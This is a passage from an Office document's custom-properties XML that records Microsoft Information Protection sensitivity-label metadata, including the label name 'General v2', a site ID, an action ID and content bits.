  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Name">
    <vt:lpwstr>General v2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SiteId">
    <vt:lpwstr>6e51e1ad-c54b-4b39-b598-0ffe9ae68fef</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ActionId">
    <vt:lpwstr>d9e48c5b-f619-480d-a2d5-45ef4812786e</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>